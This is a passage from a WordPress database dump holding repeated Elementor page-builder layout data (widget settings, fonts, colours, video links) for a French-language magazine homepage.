\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"634cd6a\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=9uOETcuFjbE\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"d8tqobd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"szy1sdj\",\"elType\":\"widget\",\"settings\":{\"title\":\"Derniers articles\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"vmz1rkd\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"loop_infinite_class\":\"loop-infinte-list-1\",\"post_icon_size_post_list_1\":{\"unit\":\"px\",\"size\":1},\"post_icon_padding_post_list_1\":{\"unit\":\"px\",\"size\":1},\"use_view_post_list_1\":\"\",\"use_category_post_list_1\":\"\",\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":13},\"use_meta_post_list_1\":\"\",\"post_list_1_excerpt_word\":2,\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height\":{\"unit\":\"em\",\"size\":1.3},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":12},\"post_list1_read_more_font_weight\":\"500\",\"post_list1_margin_bottom\":10,\"width\":\"600\",\"height\":\"600\",\"horizontal_col_select\":\"column-2\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1384,483,'_elementor_version','0.4'),(1385,484,'_elementor_edit_mode','builder'),(1386,484,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1sdsi6e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"dhtcvad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"c999aha\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"634cd6a\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=9uOETcuFjbE\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"d8tqobd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"szy1sdj\",\"elType\":\"widget\",\"settings\":{\"title\":\"Derniers articles\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"vmz1rkd\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"loop_infinite_class\":\"loop-infinte-list-1\",\"post_icon_size_post_list_1\":{\"unit\":\"px\",\"size\":1},\"post_icon_padding_post_list_1\":{\"unit\":\"px\",\"size\":1},\"use_view_post_list_1\":\"\",\"use_category_post_list_1\":\"\",\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":13},\"use_meta_post_list_1\":\"\",\"post_list_1_excerpt_word\":2,\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height\":{\"unit\":\"em\",\"size\":1.3},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":12},\"post_list1_read_more_font_weight\":\"500\",\"post_list1_margin_bottom\":10,\"width\":\"600\",\"height\":\"600\",\"horizontal_col_select\":\"column-2\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1387,484,'_elementor_version','0.4'),(1389,485,'_elementor_edit_mode','builder'),(1390,485,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\